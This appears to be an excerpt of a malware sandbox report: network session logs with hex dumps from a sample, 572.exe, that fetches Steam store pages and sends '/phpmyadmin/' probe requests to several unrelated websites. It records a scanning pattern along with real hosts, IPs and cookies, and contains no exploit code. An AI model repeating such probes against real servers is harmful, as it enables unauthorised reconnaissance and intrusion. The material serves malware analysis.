                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC14572INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00006000<!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC10016INData Raw: 3d 6a 61 70 61 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6a 61 70 61 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e6 97 a5 e6 9c ac e8 aa 9e 20 28 4a 61 70 61 6e 65 73 65 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =japanese" onclick="ChangeLanguage( 'japanese' ); return false;"> (Japanese)</a><a class="popup_menu_item tight" href="?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 67 65 73 74 69 6f 6e 73 20 3d 20 24 4a 28 22 23 64 65 65 70 5f 64 69 76 65 5f 73 65 61 72 63 68 5f 73 75 67 67 65 73 74 69 6f 6e 5f 63 6f 6e 74 65 6e 74 73 22 29 3b 0d 0a 09 09 45 6e 61 62 6c 65 53 65 61 72 63 68 53 75 67 67 65 73 74 69 6f 6e 73 28 20 74 68 69 6e 67 2c 20 27 31 5f 34 5f 34 5f 27 2c 20 27 55 53 27 2c 20 31 2c 20 27 65 6e 67 6c 69 73 68 27 2c 20 67 5f 72 67 55 73 65 72 50 72 65 66 65 72 65 6e 63 65 73 2c 20 27 32 32 32 30 36 38 35 36 27 2c 20 65 6c 65 6d 53 75 67 67 65 73 74 69 6f 6e 73 43 74 6e 2c 20 65 6c 65 6d 53 75 67 67 65 73 74 69 6f 6e 73 29 3b 0d 0a 09 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6d 65 5f 70 61 67 65 5f 63 6f 6c 5f 77 72 61 70 70 65 72 22 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00006000gestions = $J("#deep_dive_search_suggestion_contents");EnableSearchSuggestions( thing, '1_4_4_', 'US', 1, 'english', g_rgUserPreferences, '22206856', elemSuggestionsCtn, elemSuggestions);}</script><div class="home_page_col_wrapper"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC8204INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 6f 66 74 77 61 72 65 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 6f 75 6e 64 74 72 61 63 6b 73 3f 73 6e 72 3d 31 5f 34 5f 34 5f 5f 31 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 53 6f 75 6e 64 74 72 61 63 6b 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 79 5f 68 72 20 72 65 73 70 6f 6e 73 69 76 65 5f 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Software</a><a class="popup_menu_item" href="https://store.steampowered.com/soundtracks?snr=1_4_4__12">Soundtracks</a><div class="category_hr responsive_h
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 72 65 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6f 6c 75 6d 6e 26 71 75 6f 74 3b 7d 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 73 75 62 68 65 61 64 65 72 20 72 65 64 75 63 65 64 5f 76 73 70 61 63 65 20 72 65 73 70 6f 6e 73 69 76 65 5f 68 69 64 64 65 6e 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 70 6f 70 75 70 5f 67 65 6e 72 65 5f 65 78 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00004000ren&quot;:&quot;column&quot;}"><div class="popup_menu_subheader reduced_vspace responsive_hidden"><br></div><div class="popup_menu_item popup_genre_expa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC12INData Raw: 3c 64 69 76 20 63 6c 61 73 73 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 22 73 70 6f 74 6c 69 67 68 74 5f 62 6f 64 79 22 3e 4f 66 66 65 72 20 65 6e 64 73 20 46 65 62 20 31 35 20 40 20 31 30 3a 30 30 61 6d 2e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 6f 74 6c 69 67 68 74 5f 62 6f 64 79 20 73 70 6f 74 6c 69 67 68 74 5f 70 72 69 63 65 20 70 72 69 63 65 22 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 73 63 6f 75 6e 74 5f 62 6c 6f 63 6b 20 64 69 73 63 6f 75 6e 74 5f 62 6c 6f 63 6b 5f 73 70 6f 74 6c 69 67 68 74 20 64 69 73 63 6f 75 6e 74 5f 62 6c 6f 63 6b 5f 6c 61 72 67 65 22 20 64 61 74 61 2d 70 72 69 63 65 2d 66 69 6e 61 6c 3d 22 39 39 39 22 20 64 61 74 61 2d 62 75 6e 64 6c 65 64 69 73 63 6f 75 6e 74 3d 22 30 22 20 64 61 74 61 2d 64 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00004000="spotlight_body">Offer ends Feb 15 @ 10:00am.</div><div class="spotlight_body spotlight_price price"><div class="discount_block discount_block_spotlight discount_block_large" data-price-final="999" data-bundlediscount="0" data-di
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC12INData Raw: 20 20 3c 64 69 76 20 63 6c 61 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div cla
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 73 73 3d 22 6e 6f 6e 72 65 73 70 6f 6e 73 69 76 65 5f 68 69 64 64 65 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 63 6f 6e 74 65 6e 74 5f 64 69 76 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4d 6f 72 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 6d 6f 62 69 6c 65 2f 52 65 73 70 6f 6e 73 69 76 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00006000ss="nonresponsive_hidden"> <div class="responsive_content_dive"> More <img src="https://store.cloudflare.steamstatic.com/public/images/mobile/Responsive
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC8204INData Raw: 70 5f 74 61 67 22 3e 2c 20 52 6f 67 75 65 6c 69 74 65 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 6f 70 5f 74 61 67 22 3e 2c 20 41 64 76 65 6e 74 75 72 65 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 6f 70 5f 74 61 67 22 3e 2c 20 54 6f 77 65 72 20 44 65 66 65 6e 73 65 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 20 62 6f 74 68 3b 22 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 61 3e 0d 0a 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 70 70 2f 32 31 36 31 37 30 30 2f 50 65 72 73 6f 6e 61 5f 33 5f 52 65 6c 6f 61 64 2f 3f 73 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: p_tag">, Roguelite</span><span class="top_tag">, Adventure</span><span class="top_tag">, Tower Defense</span></div></div></div><div style="clear: both;"></div></a><a href="https://store.steampowered.com/app/2161700/Persona_3_Reload/?sn


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                37192.168.2.655110104.18.32.109443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC625INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=WwDsDukp_YDhK47LsOLJF_f6r.mR7Vw8Abn0xPZ6qc0-1707131691-1-AQisbQbe15NUYYAtkbEwWZ9Elw6Q9W11IhJgQEaCPS6urIjQFa99ulpwxIhOZWuJm1nzKa3XmgZY+Hh7EjUVuaQ=; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.autoplay.cloud; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6fe9bc53d4-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC744INData Raw: 31 35 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 15e7<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d 20 6f 6e 6c 69 6e 65 20 61 74 74 61 63 6b 73 2e 20 54 68 65 20 61 63 74 69 6f 6e 20 79 6f 75 20 6a 75 73 74 20 70 65 72 66 6f 72 6d 65 64 20 74 72 69 67 67 65 72 65 64 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you just performed triggered
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tton" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">81.181.57.74</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC764INData Raw: 69 64 74 68 20 3d 20 31 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 20 3d 20 27 61 62 73 6f 6c 75 74 65 27 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 74 6f 70 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 6c 65 66 74 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 20 3d 20 27 6e 6f 6e 65 27 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 20 3d 20 27 68 69 64 64 65 6e 27 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 5f 30 78 68 29 3b 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 72 28 29 20 7b 76 61 72 20 5f 30 78 69 20 3d 20 5f 30 78 68 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 5f 30 78 68 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: idth = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                38192.168.2.654964104.21.85.95443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: v.xsanime.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC610INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://xsaniime.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s16GfKi4aQTgc6K%2BN8T6rZ5ZFHenWcRG5cgXPg7iZmdvz13mh98z1oE3MzdPJlTpJOus2QT5wyEjTNtJ%2B0qX45R37vgbIbFfYdMMMxp67s7bKEi0gKSHyvN8uaQa6oJp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6fba536730-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC161INData Raw: 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9b<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                39192.168.2.655102185.51.191.48443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC185OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=e93f0d266333bc2748248aad8489a773; expires=Tue, 06-Feb-2024 11:14:50 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:50 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC7669INData Raw: 33 33 36 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 65 78 63 6f 72 65 20 2d 20 53 6e 61 6b 65 20 76 31 2e 38 30 38 20 2d 20 64 6f 62 6f 73 2e 6f 6c 69 76 65 72 40 6e 73 69 6e 66 6f 2e 68 75 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3362<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/cs
